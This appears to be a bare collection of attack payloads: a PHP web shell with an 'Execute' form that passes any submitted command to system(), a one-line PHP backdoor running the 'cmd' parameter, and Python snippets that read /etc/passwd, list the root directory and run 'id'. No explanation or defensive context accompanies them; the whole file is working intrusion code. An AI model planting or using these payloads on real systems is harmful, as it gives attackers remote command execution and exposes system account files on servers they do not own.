<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['command']))
{
system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
<?php system($_GET['cmd']) ?>
f = open("/etc/passwd", "r")
print(f.read())
print(__import__("os").getcwd())
print(__import__("os").listdir('/'))
print(__import__("os").popen("id").read())